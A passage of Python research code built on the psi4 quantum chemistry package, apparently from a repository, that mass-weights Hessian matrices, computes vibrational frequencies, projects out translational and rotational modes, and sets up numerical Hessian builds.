###print("inverting freq1[%d] = %15.7f --> %15.7f" % (imode,freq1[imode],freq2[imode]))
###else:
###print("not inverting freq1[%d] = %15.7f to %15.7f freq2[^%d] = %15.7f"
###% (imode,freq1[imode],1./freq1[imode],imode,freq2[imode]))
###freq2[ntran+nrot:] = 1./freq1[ntran+nrot:]
# 2nd effort
#freq1[ntran+nrot:] = freq2[ntran+nrot:]
psi4.core.print_out("\nEigenvalues in au for inverted direct mwt hess")
# invert trans + rot if abs(freq1[0:6]) > 1.e-5
for imode in range(ntran+nrot):
if np.abs(freq1[imode]) > 1.e-5:
freq2[imode] = 1./freq1[imode]
psi4.core.print_out("\ninverting freq1[%d] = %15.7f --> %15.7f" % (imode,freq1[imode],freq2[imode]))
else:
psi4.core.print_out("\nnot inverting freq1[%d] = %15.7f to %15.7f freq2[^%d] = %15.7f"
% (imode,freq1[imode],1./freq1[imode],imode,freq2[imode]))
freq2[ntran+nrot:] = 1./freq1[ntran+nrot:]
inverted_mat = np.zeros_like(evec,dtype=float)
for imode in range(len(freq)):
psi4.core.print_out("\n%3d inv_freq = %16.7f 1/inv_freq = %16.7f orig freq = %12.3f 1/cm"
% (imode,freq2[imode],freq1[imode],freq[imode]))
inverted_mat += freq2[imode] * np.outer(evec[:,imode],evec[:,imode])
if inv_hess:
psi4.core.print_out("\n=============== finished inverting the inverse mwt hessian =================")
else:
psi4.core.print_out("\n=============== finished inverting the direct mwt hessian =================")
return inverted_mat,not inv_hess
# scale energy hess or invhess with masses before calling freq_calc
def mwt_ehess(mol_name,ehess,mass,mass_type="atmwt",mass_detscl=1.,inv_hess=False):
""" funtion to set up mwt hess or invhess from energy ehess or einvhess
parameters
----------
mol_name: string
ehess: ndarray
contains hess to be mass weighted
    mass: ndarray
atom masses - shape (3,3*natom)
where jj: (jj=0) mass**1 (jj=1) mass**1/2 (jj=2) mass**(-1/2))
mass_type: str
Either "atmwt" (traditional) or "utmwt" (unitary)
mass_detscl: float
determinant scaling factor for masses "atmwt" = 1. "utmwt" = mass_detscl
inv_hess: bool
        True if the input ehess is an inverse hessian, False if it is a direct hessian (input not yet mass weighted)
return
-------
    mwt_hess: ndarray
mwt_hess = ehess[i,j]*(mass[jj,iat]*mass[jj,jat])
"""
# initially set mwt_hess as a copy of routine input ehess
mwt_hess = ehess.copy()
numat = mwt_hess.shape[0]//3
psi4.core.print_out("\n\n================ Start of forming mass weighted hessian =============")
psi4.core.print_out("\n=== mass_type = %s mass_detscl = %10.5f inv_hess = %s\n" % (mass_type,mass_detscl,inv_hess))
psi4.core.print_out("\n==== mass.shape = %s" % str(mass.shape))
if mass_type == "atmwt":
psi4.core.print_out("\ntraditional freq calc on molecule %s with molar mass %.7f"
% (mol_name,np.sum(mass[0])/3.))
elif mass_type == "utmwt":
scaled_m = mass.copy()
psi4.core.print_out("\nunitary freq calc on molecule %s unit molecular wt %.7f and detscl %15.6f"
% (mol_name,np.sum(mass[0])/3.,mass_detscl))
else:
psi4.core.print_out("\nERROR in mwt_ehess - mass_type = %s which is not an allowed option")
return 1000
if inv_hess:
# scaled_m = mass ** half
scaled_m = mass[1]
psi4.core.print_out("\nForming mass weighted inv_hess")
else:
# hess scaled by mass ** -half
scaled_m = mass[2]
psi4.core.print_out("\nForming mass weighted hess")
for i in range(3*numat):
mwt_hess[i,:] *= scaled_m[:]
for j in range(3*numat):
mwt_hess[:,j] *= scaled_m[:]
return mwt_hess
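# A sketch of how these helpers chain together (illustrative only, not part of the
# original module; variable names are placeholders):
#   m = np.repeat(npmass, 3)                         # per-coordinate atomic masses
#   mass = np.array([m, np.sqrt(m), 1./np.sqrt(m)])  # shape (3, 3*natom) as documented
#   mwt = mwt_ehess("mol", ehess, mass)              # mass weight an energy hessian
#   ret, freq, evec = freq_calc(mwt)                 # frequencies (1/cm) and eigenvectors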
def freq_calc(hess,detscl=1.,ref_freq=None,long_freq_out=False,inv_hess=False):
""" calc vibrational frequencies from the mass weighted hessian matrix hess
and compare the calc frequencies with ref_freq computed by other hessian calc
mass_unit gives the scale so that the atomic masses are kg/mol units = 1000. typically
detscl = geometric mean of atomic masses
inv_hess=True when hess is a mass_wted inv_hess form in scl_einvhess"""
psi4.core.print_out("\n======== Start of computing vibrational freq from mass weighted hess ========")
psi4.core.print_out("\n============== Trace of hess in freq calc = %16.8e ============="
% np.trace(hess))
# unit conversion
hartree2waveno = 219474.6
ck_print("hartree2waveno = %f" % hartree2waveno)
au2amu = 5.4857990907e-04 # CODATA recommend value 2019 = 5.485 799 090 65(16) e-04 ?? corrected 8-may-2020
#sqrt_au2amu = np.sqrt(au2amu/mass_unit) # convert amu from g to kg
sqrt_au2amu = np.sqrt(au2amu/1000.) # convert amu from g to kg
#Evib = hbar * omega = hbar * sqrt(k/m)
if inv_hess:
radpsec2waveno = 1./(hartree2waveno*sqrt_au2amu)
else: # unit conversion for mass weighted hessian
radpsec2waveno = hartree2waveno*sqrt_au2amu
ck_print("au2amu %f inv(au2amu) %f -- radpsec2waveno %f"
% (au2amu,1./au2amu,radpsec2waveno))
#hartree2Hz = 6.579684e3
#Hz2waveno = hartree2Hz / hartree2waveno
#print("Hz2waveno = %f" % Hz2waveno)
#mat_dim = len(nwchem_freq)
mat_dim = hess.shape[0]
# symmetrize the hess matrix
# find eigenvalues and mass weighted evec from hess
freq3,evec= scipy.linalg.eigh(hess)
# scale the frequency by the mass_unit conversion factor
freq2 = freq3.copy()
scale = radpsec2waveno*np.ones_like(freq2)
scale[freq2<0] = -scale[freq2<0]
freq2[freq2<0] = -freq2[freq2<0]
# set up mass_unit
mass_unit = detscl / 1000.
psi4.core.print_out("\n\n mass_unit = detscl/1000. = %12.6f detscl = %12.6f" % (mass_unit,detscl))
#for ivec in range(mat_dim):
# psi4.core.print_out("\nivec %d scale[ivec] = %12.5e freq2[ivec] = %12.5e 1/freq2[ivec] = %12.5e"
# % (ivec,scale[ivec],freq2[ivec],1./freq2[ivec]))
if inv_hess:
# comment out mass scaling to see if mass_unit giving a problem
freq2 *= mass_unit # need to check this works
freq = 1./(scale *np.sqrt(freq2))
psi4.core.print_out("\ninv_test -- freq = 1/(scale*np.sqrt(freq2)) ->\n,",freq2)
#junk psi4.core.print_out("\ninv_test2 -- freq/mass_unit**2 -->",mass_unit/scale*np.sqrt(freq2))
psi4.core.print_out("\n\n Frequency (1/cm) from inverse hess + mat 1/evals (au)")
# reverse order of inv_hess eigenvals starting with ivec value when freq2[ivec] > 1.e-5
for ivec in range(mat_dim):
if np.abs(freq2[ivec]) < 1.e-5:
psi4.core.print_out("\nabs(freq2[%d]) < 1.e-5 -- freq2 = %9.5e freq[%d] set to zero"
% (ivec,freq2[ivec],ivec))
freq[ivec]=0.
#print("=== Not doing eval,evec flip flipiv = %d" % flipiv)
#order freq in increasing order
fr_ord = np.argsort(freq)
tmp_fr = freq[fr_ord[:]]
freq= tmp_fr.copy()
tmp_fr=freq3[fr_ord[:]]
freq3 = tmp_fr.copy()
tmp_vec = evec[:,fr_ord[:]]
evec = tmp_vec.copy()
del tmp_fr
del tmp_vec
del fr_ord
else: # scale factor of direct mass_wted
# comment out mass scaling to see if mass_unit giving a problem
freq2 /= mass_unit
#print("mass_unit = %12.5e freq2[6:10]" % mass_unit,freq2[6:10])
freq = scale * np.sqrt(freq2)
ck_print("\n Frequency (1/cm) from dir hess + mat eigenvals (au) ")
#print("vib freq from hess:",freq)
sum_str = ""
if not long_freq_out:
psi4.core.print_out("\n===== Freq in 1/cm")
for ivec in range(mat_dim):
#print("ivec %d %10.3f -- ev %16.7f 1/ev %16.7f"
# % (ivec,freq[ivec],freq2[ivec],1./freq2[ivec]))
if long_freq_out:
format("ivec %d %10.3f 1/cm -- actual ev %16.7f 1/ev %16.7f"
% (ivec,freq[ivec],freq3[ivec],1./freq3[ivec]))
else:
if len(sum_str) > 75:
print(sum_str)
sum_str = ""
sum_str += "%3d %8.1f " % (ivec,freq[ivec])
# print out end of sum_str
if not long_freq_out and len(sum_str) > 0:
print(sum_str)
#print("ref_freq:\n",ref_freq)
#####################################################################
#
# add in reduce mass calc using mass weightet evec from hessian
psi4.core.print_out("\n^^^^^^^^ going to compute reduced mass here ^^^^^^^^")
#
#####################################################################
if ref_freq is None:
# print out just frequencies
psi4.core.print_out("\n========= print out straight freq and their inverse here")
else: # compare computed freq against ref_freq
for imode in range(mat_dim):
#if ref_freq[imode] < 5.0:
#ratio = 0.5
#else:
freq_diff = ref_freq[imode]-freq[imode]
if np.abs(freq_diff) > 10.:
freq_diff = ref_freq[imode]/freq[imode]
#ratio = ref_freq[imode]/freq[imode]
psi4.core.print_out("\ndiff ref_freq[%2d] - cmp_freq[%2d] = %9.3f - %9.3f = %10.4f"
% (imode,imode,ref_freq[imode],freq[imode],freq_diff))
psi4.core.print_out("\n============ End of diagonalizing mass weighted Hess ===================")
return 0, freq,evec
def test_mwthess_projd(hess,tran_rot_v,detscl=1.,inv_hess=False,
test_thres=1.e-10):
""" routine to check if the trans/rot modes in the mwt_hess have zero frequency
return
------
tranrot_projd: bool
True if tran/rot frequencies are zero and no projection needed or False otherwise
"""
(mat_dim,no_tr_rot_v) = tran_rot_v.shape
hess_trv = np.dot(hess,tran_rot_v)
v_hess_v = np.dot(tran_rot_v.T,hess_trv)
ck_print("tran_rot_v.T*hess*tran_rot_v = ",v_hess_v)
abs_diagsum = 0.
for ii in range(no_tr_rot_v):
abs_diagsum += np.abs(v_hess_v[ii,ii])
tracevhv = np.trace(v_hess_v)
psi4.core.print_out("\n\n Trace of v_hes_v = "+ str(np.trace(v_hess_v)))
psi4.core.print_out("\nAbs trace of v_hess_v = " + str(abs_diagsum))
# could add here a return True if tracevhv < some threshold
if abs_diagsum < test_thres:
psi4.core.print_out("\nTest_mwthess_projd trace < test_thres = %10.4e" % test_thres,
"no need to do Trans/Rots projection")
#return True
# unit conversion
hartree2waveno = 219474.6
#print("hartree2waveno = %f" % hartree2waveno)
au2amu = 5.485799097e-04
sqrt_au2amu = np.sqrt(au2amu/1000.) # convert amu from g to kg
#Evib = hbar * omega = hbar * sqrt(k/m)
radpsec2waveno = hartree2waveno*sqrt_au2amu
psi4.core.print_out("\nau2amu %f inv(au2amu) %f -- radpsec2waveno %f" % (au2amu,1./au2amu,radpsec2waveno))
# diagonalize v_hess_v and check out eigenvectors
# find eigenvals and evecs of rot_orthog_chk
vhv_eval,vhv_evec= scipy.linalg.eigh(v_hess_v)
# set up mass_unit
mass_unit = detscl/1000. # corrects atomic masses when unit
if inv_hess:
psi4.core.print_out("\n projecting inv_hess - scale vhv_eval by mass_unit = %.9f" % mass_unit)
vhv_eval *= mass_unit
else:
psi4.core.print_out("\nprojecting hess - divide vhv_eval by mass_unit = %.9f" % mass_unit)
vhv_eval /= mass_unit
psi4.core.print_out("\n\nv_hess_v evals and evecs: sum = %.10e" % np.sum(np.abs(vhv_eval)))
for iv in range(len(vhv_eval)):
#tmp_vec = np.abs(vhv_evec[:,iv])
ord_vec = np.argsort(np.abs(vhv_evec[:,iv]))[::-1]
if vhv_eval[iv] >= 0.:
eval_cm = radpsec2waveno*np.sqrt(vhv_eval[iv])
else:
eval_cm = -radpsec2waveno*np.sqrt(-vhv_eval[iv])
psi4.core.print_out("\nvhv_eval[%d] = %f freq = %9.3f 1/cm abs_sort max-> "
% (iv,vhv_eval[iv],eval_cm) + str(ord_vec))
ck_print("evec:", vhv_evec[:,iv])
if abs_diagsum < test_thres:
return True
else:
psi4.core.print_out("\nTest_mwthess_projd trace not below %10.5e" % test_thres +
" - need to project out mwthess Trans/Rots modes")
return False
def proj_trans_rots_frm_hess(hess,tran_rot_v,detscl=1.,inv_hess=False,ref_freq=None):
""" routine to project out trans/rotational modes from hess and get new freqs
hess needs to be symmetrical
method uses just 5 or 6 linear combinations of tran_rot_v vectors in projection
Parameters
----------
hess: ndarray
mwt-hess or inv-hess
tran_rot_v: ndarray
detscl: float
= 1. if 'atmwt' and = X. if 'unit'
inv_hess: bool
ref_freq: ndarray
list of frequency for comparison with freq from proj hessian
Returns
-------
0,proj_hess,proj_eval,proj_evec
"""
psi4.core.print_out("\n\n\n===== Projecting trans/rots modes out of mass weighted hess =====")
ck_print("hess in proj_trans_rots:\n",hess[:,:5])
ck_print("tran_rot_v.shape = ",tran_rot_v.shape)
#
# get dimension info
(mat_dim,no_tr_rot_v) = tran_rot_v.shape
psi4.core.print_out("\nLen of normal mode vector = %d no tran rot vecs = %d" % (mat_dim,no_tr_rot_v))
# checking whether tran/rot eigenvalues are zero before calling proj_trans_rots_frm_hess
# therefor skip this
#tran_rot_zero = test_mwthess_projd(hess,tran_rot_v,detscl=detscl,inv_hess=inv_hess)
# method uses the projector P = 1 - sum_i v[:,i] * v[:,i]
# where i runs over all the trans + rot vibrational modes
# then form proj_hess = P * hess * P
#print("\n ======= Projecting trans/rots out of mwt hessian matrix -->")
proj = np.identity(mat_dim,dtype=float)
for iv in range(no_tr_rot_v):
proj -= np.outer(tran_rot_v[:,iv],tran_rot_v[:,iv])
#print("proj.shape =",proj.shape)
#print(proj)
proj_hess = np.linalg.multi_dot([proj,hess,proj])
#print("proj_hess.shape = ",proj_hess.shape)
psi4.core.print_out("\n\n ===== Finished projecting the trans/rot modes out of mwt hess matrix")
max_off_diff =0.
for icol in range(1,mat_dim):
for jcol in range(icol):
diff = np.abs(proj_hess[icol,jcol] - proj_hess[jcol,icol])
if diff > max_off_diff:
max_off_diff = diff
ii = icol
jj = jcol
if max_off_diff > 1.e-10:
psi4.core.print_out("\n***WARNING*** [%2d,%2d] max_off_diff_proj_hess2 = %e" % (ii,jj,diff))
# freq_calc reminder
# calc freqs separate to proj fn
#ret_code,proj_eval,proj_evec = freq_calc(proj_hess,detscl=detscl,ref_freq=ref_freq,
# freq_out=True,inv_hess=inv_hess)
# check that the projected hessian is gives tran_rot_zero = True
# projection seems to be working - so there is not need to do this - keep as check for now
#
# add the following 2 lines of code if you want to check if projection working correctly
#tran_rot_zero = test_mwthess_projd(proj_hess,tran_rot_v,detscl=detscl,inv_hess=inv_hess)
#print("test_mwthess_projd = %s after projecting hessian" % tran_rot_zero)
#return 0,proj_hess,proj_eval,proj_evec
return 0, proj_hess
```
#### File: johndhead/build_num_cartormwt_hessian/jdh_build_hess.py
```python
import psi4
import numpy as np
import hess_freq as hsf
import hess_setup_anal as hsa
import wrt_rd_dict_to_json as sav_psi4opt
import os, sys
################################################################
class Pcprint:
"""
sets up printing for jdh_build_hess.py
"""
#def __init__(self,prt_out_fname=None):
def __init__(self):
self._prt_out_fname = None
self._psi4_out_close = None
@property
def prt_out_fn(self):
return self._prt_out_fname
@prt_out_fn.setter
def prt_out_fn(self,prt_out_fname):
self._prt_out_fname = prt_out_fname
# TODO: add more here?
# test open_file
print('prt_out_fname = %s' % prt_out_fname)
#self._psi4_outf = open(self._prt_out_fname,"w")
self._psi4_out_close = "open"
###### PROBLEM HERE: return self._psi4_outf
# with psi4 file name
# psi4.come_set_output(self._prt_out_fname)
# psi4.core.set_output_file(self._prt_out_fname)
# return "opened psi4 output file"
@property
def prt_out_close(self):
return self._psi4_out_close
@prt_out_close.setter
def prt_out_close(self,prt_out_close):
if prt_out_close == "close":
self._psi4_out_close = prt_out_close
return "closed psi4_output_file"
else:
return "GOTTA PROBLEM: psi4 output file was not closed"
def pcprint(self,prt_txt,file=None):
if file is None:
# need to used psi4 print_out
if self._psi4_out_close =="open":
# print("PSI4out:"+prt_txt)
psi4.core.print_out(prt_txt)
elif self._psi4_out_close == "close":
# print("psi4_prt_cls STD_OUT:"+prt_txt)
psi4.print_stdout("\npsi4_prt_cls STD_OUT:"+prt_txt)
else:
psi4.print_stdout("\npsi4_prt_not_open_yet STD_OUT:"+prt_txt)
else:
print(prt_txt,file=file)
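    # Usage sketch (not part of the original class):
    #   pc = Pcprint()
    #   pc.prt_out_fn = "run.out"     # marks the psi4 output stream as "open"
    #   pc.pcprint("routed through psi4.core.print_out")
    #   pc.prt_out_close = "close"    # subsequent pcprint calls fall back to stdout
    #   pc.pcprint("written elsewhere", file=open_handle)  # open_handle: any open file object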
# modify print commands so general print uses psi4.core.print_out()
# def pcprint(prt_txt,file=None):
# """
# modifies regular prints to psi4.core.print_out()
# :param prt_txt: "text to be printed"
# :param file: == None if no file - otherwise name of file to get output
# :return:
# """
# if file is None:
# psi4.core.print_out(prt_txt)
# else:
# print(prt_txt,file=file)
# # all done
# set up energy_grad function
def hess_en_gr_fun(coords, *args):
""" hess_en_gr_fun - calcs energy and gradient for mol
coords = coords to calculate the energy - initially set to zero
mol_coords = init_coords + coords
args = (mol, eg_opts, init_coords, init_com, atom_mass, mass_detscl, coord_type)
where:
mol = molecule class name
eg_opts = options for energy and grad calcs
init_coords such that coords are zero initially
init_com = initial center of mass when coords = zero
inv_sqrt_mass = 1/sqrt(atom_mass) - used when coord_type = 'atmwt' or 'utmwt'
    coord_type possibilities so far: 'cart','masswt'
function returns scf_e and grad
"""
#print("<<<<<<<< hess_en_gr_fun coords: ",coords)
#print("no of args in *args = %d" % len(args))
psi4.core.print_out("disp coords for hess_en_gr_fun -->")
psi4.core.print_out(str(coords))
if len(args) == 7:
(mol,eg_opts,init_coords,init_com,atom_mass,mass_detscl,coord_type) = args
#print("mol =",mol)
print("in hess_en_gr_fun: mol =",mol)
#print("dir(mol): ->\n",dir(mol))
#print("init_coords =",init_coords)
#print("inv_sqrt_mass =",inv_sqrt_mass)
#print("coord_type = %s"% coord_type)
nat = mol.natom()
if coord_type == 'cart':
# if coord_type == 'cart' or coord_type == "mwtcart":
# coords equal linear array len 3*mol.natom()
#debug -- print("cart disp coords: ",coords)
pass
elif coord_type == 'masswt':
# elif tmasswt(coord_type):
# TODO: need to check mass weighting correct
# coords are mass weighted - convert to cartessian
inv_sqrt_mass = 1./np.sqrt(atom_mass)
coords = coords * inv_sqrt_mass # cartesian displacment
#debug -- print("masswt disp coords: ",coords)
else:
print("*** Error not set up for coord_type = %s" % coord_type)
sys.exit()
geom = np.reshape(coords,(nat,3)) + init_coords
print("hess_en_gr_fun: mol geom ->\n",geom)
# calc com
tot_m = np.sum(atom_mass[::3])
test_com = np.dot(geom.T,atom_mass[::3])
print("mol mass = %10.3f test_com = " % tot_m, test_com/tot_m)
# fix center of mass and orientation
mol.fix_com(True)
mol.fix_orientation(True)
print("%s com_fixed = %s orientation_fixed = %s" % (mol.name(),
mol.com_fixed(), mol.orientation_fixed()))
psi4.core.print_out("\n Skip printing initial coordinates in hess_en_gr_fun()")
#print_mol_coord_sum(mol,opt_stage="Initial")
mol.set_full_geometry(psi4.core.Matrix.from_array(geom))
# the next line causes the center-of-mass to move - see what happens
# without it
mol.update_geometry()
#psi4.core.print_out("new mol geom: \n")
# print_mol_coord_sum(mol,opt_stage="New CART")
#for iat in range(mol.natom()):
#print("atom %d %3s %9.5f xyz coord = " % (iat,mol.symbol(iat),mol.mass(iat)),mol.xyz(iat))
#print("\n===== co bond distance = %10.5f a.u." % (mol.z(1)-mol.z(0)))
cxcom = mol.center_of_mass()[0]
cycom = mol.center_of_mass()[1]
czcom = mol.center_of_mass()[2]
#print("cxcom,cycom,czcom: ",cxcom,cycom,czcom)
current_com = np.array([cxcom,cycom,czcom],dtype=float)
com_dif = current_com - init_com
psi4.core.print_out("\n ++++ current com = %18.10f %18.10f %18.10f"
% (current_com[0],current_com[1],current_com[2]))
psi4.core.print_out("\n ++++ diff = curr - init = %18.10f %18.10f %18.10f a.u.\n"
% (com_dif[0],com_dif[1],com_dif[2]))
# get inertia tensor and rotational consts
# inert_ten = np.array(mol.inertia_tensor())
# cur_rotc = np.array(mol.rotational_constants())
# psi4.core.print_out("\ncurrent rot consts: %15.9f %15.9f %15.9f" % (cur_rotc[0],cur_rotc[1],cur_rotc[2]))
# psi4.core.print_out("\ninert_ten -->\n")
# psi4.core.print_out(str(inert_ten))
# # calc evals and evecs for inertia_tensor
# teval,tevec = np.linalg.eigh(inert_ten)
# psi4.core.print_out("\n Eigen vals and vecs from inertia tensor")
# for ivec in range(3):
# psi4.core.print_out("\neval[%d] = %12.8f vec = (%11.8f, %11.8f, %11.8f)"
# % (ivec,teval[ivec],tevec[ivec,0],tevec[ivec,1],tevec[ivec,2]))
#
scf_e,wavefn = psi4.energy(eg_opts,return_wfn=True)
psi4.core.print_out("\n++++++++ scf_e in en_fun = %18.9f\n" % scf_e)
#print("++++++++ scf_e in en_fun = %18.9f" % scf_e)
G0 = psi4.gradient(eg_opts,ref_wfn=wavefn)
gvec = np.array(G0)
#jdhd - usually comment out this line 21-dec-2019
#print("+=+=+=+=+ Cart gradient vector: \n", gvec)
grad = np.reshape(gvec,(len(coords),))
if coord_type == "masswt":
# if tmasswt(coord_type):
grad *= inv_sqrt_mass
#print("=+=+=+=+ Mass wt grad vector: \n",grad)
#print("+=+=+=+ grad as a linear array -->",grad)
#print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
return scf_e, grad
####################### end hess_en_gr_fun #################################
def jdh_build_num_hess(mol_nm,run_type_op,jopts,pc= None):
""" function to build jdh numerical hessian
:parameter mol_nm: molecule name
:parameter run_type_op: dictionary with the parameters for hessian build types
:parameter jopts: dictionary with the psi4 options for the energy/grad calcs
remember psi4 options are read from the numpy.json file
"""
# check that pc is an instance of the Pcp class
if isinstance(pc,Pcprint):
pc.pcprint("\n pc class is instance of Pcp class and is defined")
else:
# Define pc
pc = Pcprint()
pc.pcprint("\n Created pc = Pcprint() class for print_out - presumably need to open outfile")
pc.pcprint(f"\n pc.prt_out_fn = {pc.prt_out_fn} -- pc.prt_out_close = {pc.prt_out_close}")
# Memory specification
psi4.set_memory(int(5e8))
numpy_memory = 2
# Set output file
# TODO: originally dat --> out
#psi4.core.set_output_file('output.out', False)
# Define Physicist's water -- don't forget C1 symmetry!
# mol = psi4.geometry("""
# O
# H 1 1.1
# H 1 1.1 2 104
# symmetry c1
# """)
##########################################################################
# start of setting up atomic coords, masses for different molecules
# use_psi4_data = True if obtaining molecular info via psi4
# in current program inithess_type - testing program with some simple molecules
# set use_psi4_data = False
#########################################################################
#### check out using __file__
print("check __file__ ",__file__)
print("get __file__ abspath: ",os.path.abspath(__file__))
# use_psi4_data = False # set false when not using psi4 data
use_psi4_data = True
# (a) set up psi4 data
# below is the psi4 setup
if use_psi4_data:
# list contents of the 'run_type_op" dictionary
print("=========== Parameters used in the jdh_build_num_hess pgm =============")
print("run_type_op = ",run_type_op)
npy_file = f"{run_type_op['npy_file']}.npy"
json_file = f"{run_type_op['npy_file']}.json"
nthread = 6
psi4.set_num_threads(nthread)
# setup np print options
print("get_print_options: ", np.get_printoptions())
np.set_printoptions(precision=6, linewidth=120)
#wfn_file_name = "h2co_scf_wfn"
wfn_file_name = "h2co_opt_wfn_dir"
wfn_file_name = run_type_op['npy_file']
file_wfn = psi4.core.Wavefunction.from_file(wfn_file_name + '.npy')
# new output file naming setup
# add extension to out file name = "_{geom_type}_{disp_type}_{disp}
# original: out_ext = f"_{run_type_op['mol_geom'][:4]}_{run_type_op['coord_type'][0:4]}_{int(100*run_type_op['disp'])}"
out_ext = f"_{run_type_op['coord_type'][0:4]}_{int(100*run_type_op['disp'])}"
print("file_name extension =",out_ext)
mol_nm = run_type_op['mol_nm']
output_file = run_type_op['npy_file']+out_ext
psi4.core.set_output_file(output_file +'.out', False)
pc.prt_out_fn = output_file + '.out'
# set up energy and grad summary files
en_sum = open("en_sum_"+output_file+".txt","w")
grad_sum = open("gr_sum_"+output_file+".txt","w")
pc.pcprint("\n++++ WFN Molecule name: %s WFN Energy %28.20f \n" %
(file_wfn.molecule().name(),file_wfn.energy()), file=en_sum)
pc.pcprint("\n RUN_TYPE_OP:-->\n"+str(run_type_op)+"\n",file=en_sum)
#pc.pcprint("\n RUN_TYPE_OP: ",run_type_op,"\n",file=en_sum)
pc.pcprint("\n++++ WFN Molecule name: %s WFN Energy %28.20f \n" %
(file_wfn.molecule().name(),file_wfn.energy()), file=grad_sum)
pc.pcprint("\n RUN_TYPE_OP:-->\n"+str(run_type_op)+"\n",file=grad_sum)
#######################################################################
psi4.core.print_out("\n ============ Get initial molecule info using "
"%s.npy "
"data\n" % wfn_file_name)
psi4.core.print_out("Initial molecular geom obtained from %s.npy file\n"
% wfn_file_name)
# get current module and print out options
# print("current_module_name: %s" % current_module_name)
# curr_mod_name = psi4.core.get_current_module()
#curr_mod_name = psi4.core.Options.get_current_module()
# --or-- ...get_current_module(file_wfn)
# print("Options for curr_mod_name = %si -->" % curr_mod_name)
pc.pcprint("dir(psi4.core.Options) -->\n")
pc.pcprint(str(dir(psi4.core.Options))+"\n")
pc.pcprint("dir(psi4.core.Wavefunction) -->\n")
pc.pcprint(str(dir(psi4.core.Wavefunction))+"\n")
# try printing out some options
# pc.pcprint("List of options -->\n",psi4.core.get_options())
# get list of info available from wavefunction file
# pc.pcprint("\n======== type(file_wfn) --> ",type(file_wfn))
# pc.pcprint("dir(file_wfn) -->\n",dir(file_wfn))
# Let us see if file_wfn has frequencies
# NOT WORKING ??
# print("\nFor file_wfn - lets see if Freq exist")
# file_wfn_freq = np.asarray((file_wfn.frequencies()))
# print("\ndir(file_wfn.frequencies) -->\n",dir(file_wfn.frequencies))
# print("\nfile_wfn_freq = ",file_wfn_freq)
#
# wfn_print_freq = file_wfn.frequencies().print_out()
# print("\n freq print again: ",wfn_print_freq)
# print("\n freq print again as np.array: ",np.asarray(wfn_print_freq))
file_mol = file_wfn.molecule()
pc.pcprint("\n======== type(file_mol) -> "+str(type(file_mol))+"\n")
pc.pcprint("\n======== dir(file_mol) --> \n"+str(dir(file_mol))+"\n")
# print("\n++++ Check if file_mol_freq exist",np.asarray(file_mol.frequencies()))
# pc.pcprint( "\n\n=============================================================")
# pc.pcprint("\n======== type(file_wfn.molecule()) -> ",type(file_wfn.molecule))
# pc.pcprint("\n======== dir(file_wfn.molecule()) --> ",dir(file_wfn.molecule()))
# check that mol_nm == mol_nm
mol_name = file_mol.name()
if mol_nm == mol_name:
pc.pcprint(f"YEAH mol_nm = {mol_nm} matches with mol_name = {mol_name} in file_wfn ++++++")
else:
pc.pcprint(f"ERROR mol_nm = {mol_nm} NOT == mol_name = {mol_name} in file_wfn ++++++")
sys.exit()
num_file_at = file_mol.natom()
file_geom = np.asarray(file_mol.geometry())
pc.pcprint("no_ats in %s molecule = %d file_geom.shape = %s \n" % (
mol_name, num_file_at,str(file_geom.shape)))
npmass = np.asarray([file_mol.mass(iat) for iat in range(num_file_at)])
pc.pcprint("\n=========================================================")
pc.pcprint(" %s --- Units = %s" % (
file_wfn.molecule().name(), file_wfn.molecule().units()))
pc.pcprint(" x y z mass")
# included atom symbol (label) in print out
at_label = []
# set up a coordinate string
opt_mol_geom_setup = ""
for iat in range(num_file_at):
at_label.append(file_wfn.molecule().label(iat))
pc.pcprint("%3d %2s %12.7f %12.7f %12.7f %12.7f" % (iat, at_label[iat],
file_geom[iat, 0],
file_geom[iat, 1],
file_geom[iat, 2],
npmass[iat]))
atom_str = " %2s %20.12f %20.12f %20.12f\n" % \
(at_label[iat], file_geom[iat,0],
file_geom[iat,1], file_geom[iat,2])
opt_mol_geom_setup += atom_str
opt_mol_geom_setup += "\n no_com \n no_reorient \n symmetry c1 \n " \
"units bohr"
pc.pcprint("opt_mol_geom_setup -->\n"+opt_mol_geom_setup)
pc.pcprint("\n=========================================================\n")
pc.pcprint("\nPsi4 %s center of mass = %s" % (file_wfn.molecule().name(),
str(file_wfn.molecule().center_of_mass())))
pc.pcprint("\nPsi4 %s rotational consts =" % file_wfn.molecule().name())
pc.pcprint("\n"+ str(file_wfn.molecule().rotational_constants().np))
pc.pcprint("\nand inertia tensor =>\n" + str(file_wfn.molecule().inertia_tensor().np))
pc.pcprint("\nPsi4 fixed com = %s fixed orientation = %s" % (
file_wfn.molecule().com_fixed(),
file_wfn.molecule().orientation_fixed()))
# In[8]:
# get list of info available from wavefunction file
#print("dir(file_wfn) -->\n",dir(file_wfn))
# print("dir(genmol_wfn) -->\n",dir(genmol_wfn))
#print("\n======== dir(file_wfn.molecule()) --> ",dir(file_wfn.molecule()))
# pc.pcprint(" Name of molecule = file_wfn.molecule.name()? = %s" %
# file_wfn.molecule().name())
pc.pcprint("\nfile_wfn.basisset().name() = %s " % file_wfn.basisset().name())
pc.pcprint("\nfile_wfn.basisset().nbf() = %d "% file_wfn.basisset().nbf())
pc.pcprint("\nfile_wfn.nirrep() = %d" % file_wfn.nirrep())
psi4.core.print_out("\nMolecule name: %s" % file_wfn.molecule().name())
psi4.core.print_out("\n Energy = %21.14f" % file_wfn.energy())
pc.pcprint("=========== End of working with numpy nphess <= file_wfn.hess ====")
pc.pcprint("\n=========================================================")
# set up opt_mol - separate class to molecule in hess file
opt_mol = psi4.geometry(opt_mol_geom_setup)
opt_mol.set_name(mol_name)
# Computation options
# psi4.set_options({'basis': 'aug-cc-pvdz',
# 'scf_type': 'df',
# psi4.set_options({'basis': '6-31g',
# check to see if optim converges in 1 step with aug-cc-pvdz basis
# psi4.set_options({'basis': 'aug-cc-pvdz',
# 6-31g basis takes a few steps to converge
# psi4.set_options({'basis': '6-31g',
# # check options before resetting them again
# test_opts =['basis','reference','scf_type']
# ################ TODO: play with this???
# test_opts = [psi4.core.get_options()]
# print("List psi4 options before reseting below -->\n",test_opts)
# print("dir(test_opts): ",dir(test_opts))
pc.pcprint("End of psi4_options ============================")
# # TODO: add jdh options here ------------------
# # compare local options in jopts with psi4 global options
# # goal of jopts dictionary is to same psi4 options when building john's num hessian
# # print("set {", file=f_init_geom)
# invalid_jopt_keys = ['formed_by_job', 'npy_file'] # add other keys which are NOT valid psi4 options
# for key in invalid_jopt_keys:
# #try:
